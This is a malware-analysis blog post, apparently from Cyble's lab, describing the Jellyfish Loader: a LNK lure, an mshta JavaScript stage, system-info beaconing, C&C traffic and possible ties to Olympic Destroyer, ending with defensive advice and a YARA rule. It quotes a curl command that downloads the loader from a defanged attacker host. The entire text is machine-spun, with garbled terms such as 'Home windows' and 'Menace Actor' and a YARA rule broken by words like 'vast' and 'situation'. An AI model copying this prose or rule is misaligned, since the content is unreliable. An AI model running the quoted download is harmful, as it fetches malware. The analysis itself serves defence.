Investigating The New Jellyfish Loader 

Key Takeaways 

• Cyble Analysis and Intelligence Labs (CRIL) has come throughout a brand new .NET-based ShellCode loader named Jellyfish Loader. 
• Jellyfish Loader makes use of asynchronous job methodology builders to execute code. 
• The loader makes use of Fody and Costura to embed dependencies as assets throughout the executable. 
• Jellyfish Loader has the potential to ship system info upon preliminary an infection and employs SSL certificates validation earlier than Command and Management (C&C) communication. 
• The C&C additional sends shellcode to the sufferer’s machine for additional malicious actions. 
• The C&C infrastructure, initially utilized by a Menace Actor (TA) in 2018 for downloading an encrypted PowerShell script, is now being utilized by the Jellyfish Loader. 
• The coding model of the PowerShell script used to obtain an encrypted PowerShell content material is much like the samples noticed in Olympic Destroyer, as documented by Kaspersky in 2018. 

Overview 

CRIL researchers got here throughout a ZIP file, initially uploaded from Poland. This file incorporates a Home windows shortcut (.lnk). When executed, the .lnk file opens a clear PDF and subsequently downloads and executes a brand new .NET-based shellcode loader, JellyfishLoader. 

The brand new Jellyfish Loader is notable for its lack of obfuscation, with its code clearly structured to handle safe communication by means of SSL certificates validation. It prepares JSON payloads, sends HTTP POST requests asynchronously and has capabilities to obtain and execute shellcode. Using `AsyncTaskMethodBuilder`and state machine-like code is attribute of strategies generated by the C# compiler for dealing with asynchronous operations. 

The Jellyfish Loader makes an attempt to connect with the URL “hxxps://ping.connectivity-check[.]com,” and tries to obtain the shellcode. Nevertheless, throughout our testing, the shellcode was not efficiently delivered. The area “connectivity-check[.]com” is utilized by two malicious paperwork that carefully resemble these used within the 2018 Olympic Destroyer operation by the Russian risk actor Hades. Olympic Destroyer was a complicated cyber-sabotage assault focusing on the organizers, suppliers, and companions of the 2018 Winter Olympic Video games in Pyeongchang, South Korea. This assault concerned the unfold of a damaging community worm designed to disrupt the occasion. 

Technical Particulars 

CRIL got here throughout an fascinating zip file named Lisa.pdf.zip with sha256 as 66d24e2081fcfe3ffdcf80e208553f32b088c7e863668ab3813ba980e1efbc2c whose potential origin is unknown. This file incorporates a .lnk file named Lisa.pdf.lnk with sha256 as 6d47ce1660eb54a31e7870b170605f9641ec97d756fb865f3a5e357649dc204, masquerading as a pdf file. The goal of the .lnk file is configured to execute a JavaScript file utilizing `mstha.exe`, with intentional areas added to obscure the precise URL, as illustrated within the determine beneath. 

Determine 1 – Properties of The LNK File 

TA has added junk knowledge to lnk file to deliberately improve the file dimension to evade detection. The determine beneath exhibits the junk knowledge contained in the hyperlink file. 

Determine 2 – Junk Knowledge Embedded within the Shortcut LNK File 

The goal command of the .lnk file is as follows: 

The distant URL hosts obfuscated JavaScript, which is executed by mshta.exe to hold out additional malicious actions. The determine beneath exhibits the obfuscated javascript code. 

Determine 3 – Obfuscated JavaScript File 

This malicious JavaScript file additional downloads a clear PDF lure file and the newly detected Jellyfish Loader executable. Following is the command executed by the malicious script to obtain the Jellyfish Loader file: 

• “C:WindowsSystem32curl.exe” “hxxps://file.compute-ec2-aws.com/BinSvc.exe” -o “C:UsersMalWorkstationAppDataLocalMicrosoftBinSvc.exe” 

The lure file is a clear PDF containing a picture of a key, making it troublesome to establish the motive and goal of the marketing campaign. The determine beneath exhibits the lure doc. 

Determine 4 -Lure Doc. 

Jellyfish Loader 

The Jellyfish loader “BinSvc.exe” is a 64-bit .NET-based executable with the SHA-256 hash e654e97efb6214bea46874a49e173a3f8b40ef30fd0179b1797d14bcc2c2aa6c. Evaluation of the loader’s code reveals that its title is JellyfishLoader, compilation date is 2089-06-18 and its software model is 0.3.2, indicating that it’s within the early phases of improvement.  

Asynchronous Predominant Technique  

The `Predominant` methodology serves because the entry level of the applying and is asynchronous, returning a `Process`. The complexity of the syntax is because of it being auto-generated code, a typical characteristic in async strategies compiled to Intermediate Language (IL). The determine beneath illustrates the asynchronous `Predominant` methodology. 

Determine 5 – Asynchronous Predominant Technique 

Compressed DLLs 

The executable makes use of Fody, an extensible software for weaving .NET assemblies. Fody permits for the manipulation of an meeting’s Intermediate Language (IL) through the construct course of, a job that sometimes requires substantial plumbing code. Moreover, it employs Costura, a Fody add-in that embeds dependencies as assets.  

The loader incorporates assist DLLs that are compressed and solely decompressed on the time of execution. The compressed DLLs are current within the Useful resource part of the executable. The determine beneath exhibits the compressed DLL recordsdata. 

Determine 6 – Compressed DLL Information 

System Info 

The Jellyfish loader extracts primary system info from the contaminated system and shops it in json string format. The determine beneath exhibits the knowledge extracted by the Jellyfish loader. 

Determine 7 – System Particulars Extracted 

Base64 Encoding 

After gathering the system knowledge within the type of JSON string the information is then obfuscated with Base64 encoding. The determine beneath exhibits the routine to encode the information. 

Determine 8 – Routine to Base64 Encode the System Knowledge 

C&C Communication 

After encoding and staging the information the loader makes use of SendPostRequest() methodology which takes URL and UUID as arguments and sends an HTTP POST request to the url “hxxps://ping.connectivity-check[.]com”. The determine beneath exhibits the code for C&C communication. 

Determine 9 – Code for C&C Communication 

SSL Certificates Validation 

The loader has a way ValidateServerCertificate which validates the server’s SSL certificates. It checks if the certificates is already validated (isCertificateValidated), and if not, it tries to validate the certificates by calling the IsCertificatePinned methodology. If the certificates matches the pinned certificates, it units isCertificateValidated to true. The determine beneath exhibits the code for SSL Certificates Validation. 

Determine 10 – Code for SSL Validation 

ShellCode Runner 

Whereas analyzing the loader, we noticed that the C&C server didn’t ship the anticipated shellcode, stopping additional investigation. Nevertheless, the loader incorporates a operate designed to execute shellcode, suggesting it has the potential to course of and execute shellcode acquired from the distant C&C server. The determine beneath exhibits the routine to execute ShellCode. 

Determine 11 – Code to Run ShellCode 

Area Evaluation 

As mentioned beforehand the C&C area title “connectivity-check[.]com” seen first in 2016 and has been registered underneath numerous ASNs since then, as proven beneath.  

Determine 12 – PDNS of Connectivity-check.com 

The TA has predominantly utilized ASN 16509 (AMAZON-02) for area registration since 2019. This implies that the identical Menace Actor may be registering area utilizing totally different IP addresses. It has been noticed that the TA has created a number of subdomains designed to look as respectable connectivity checks for potential command-and-control (C&C) communication. 

Determine 13 – Subdomains Registered 

Curiously, we now have noticed two malicious DOC recordsdata submitted to VirusTotal in 2018, which is connecting to the identical area “connectivity-check[.]com” to obtain PowerShell scripts for additional malicious actions as proven in Determine 11.  

Determine 14 – PowerShell Script Downloads Payload from connectivity-check.com : submitted to VT in 2018 

This script first checks if the PowerShell model is larger than 3. If the situation is met, it proceeds to disable the PowerShell script logging and Antimalware Scan Engine (AMSI) earlier than persevering with execution. Following this, it establishes a connection to the C&C area to retrieve an encrypted payload from a distant server. The content material of this payload is encrypted utilizing RC4, and decryption happens utilizing a predefined key hardcoded within the PowerShell script. As soon as decrypted, the content material is then executed utilizing the Invoke-Expression cmdlet. 

Our investigation additional revealed that similarities within the coding model used for disabling script logging, RC4 decryption, and the operate designed to obtain encrypted knowledge, resembling methods documented within the Olympic Destroyer weblog by Kaspersky in 2018. Later, Kaspersky attributed the Olympic Destroyer to the Hades group, which employed Empire PowerShell, an open-source post-exploitation framework, as its closing payload. 

Determine 15 – Coding Type similarities 

Figuring out the exact risk actor accountable for this jellyfish loader presents challenges. Nevertheless, our analysis goals to doc these findings in a weblog for reference functions, illustrating the noticed similarities and potential associations with out conclusively linking the Jellyfish loader to the Hades group. Additional investigation and collaboration are essential to validate and broaden upon these observations. 

Conclusion 

The Jellyfish loader make the most of instruments like Fody and Costura for dependency embedding and using asynchronous job strategies for execution. The Jellyfish loader gathers system info, verifies SSL certificates, after which initiates command-and-control (C&C) communication, downloading shellcode for subsequent malicious operations. Though we can not definitively affirm this because the work of the Hades group, the investigation exhibits similarities, suggesting a brand new malware variant. Further investigation and collaboration are important to validate and substantiate this potential affiliation. 

Our Suggestions 

Following are our suggestions towards the Jellyfish Loader Marketing campaign. 

• Implement strong antivirus and anti-malware options that may detect and mitigate shellcode-based assaults. Repeatedly replace signatures and heuristic detection capabilities. 
• Section your community to restrict the lateral motion of malware inside your group, decreasing the impression of a possible breach. 
• Implement software whitelisting to permit solely licensed functions to execute, thereby stopping unauthorized shellcode from working. 
• Make use of steady community monitoring to detect uncommon visitors patterns or connections indicative of shellcode execution or command-and-control (C&C) communications. 
• Constantly monitor community visitors for uncommon exercise, equivalent to makes an attempt to connect with recognized malicious URLs or surprising knowledge exfiltration makes an attempt. 
• Implement SSL/TLS inspection to watch encrypted visitors and detect malicious actions hidden inside safe communications. 

MITRE ATT&CK® Strategies 

Indicators Of Compromise

 Reference 

Yara Rule 

rule Jellyfish_Loader 

{ 

meta: 

    writer = "CRIL" 

    description = "Yara Rule to Establish jellyfish loader" 

    target_entity = "Home windows executable Information" 

strings: 

    $str1 = "costura.system" vast ascii     

    $str2 = "qemu-ga.pdb" vast ascii 

    $str3 = "connectivity-check.com" vast ascii 

    $str4 = "Jellyfish" vast ascii 

 

situation: 

    all of ($str*) 

} 

Associated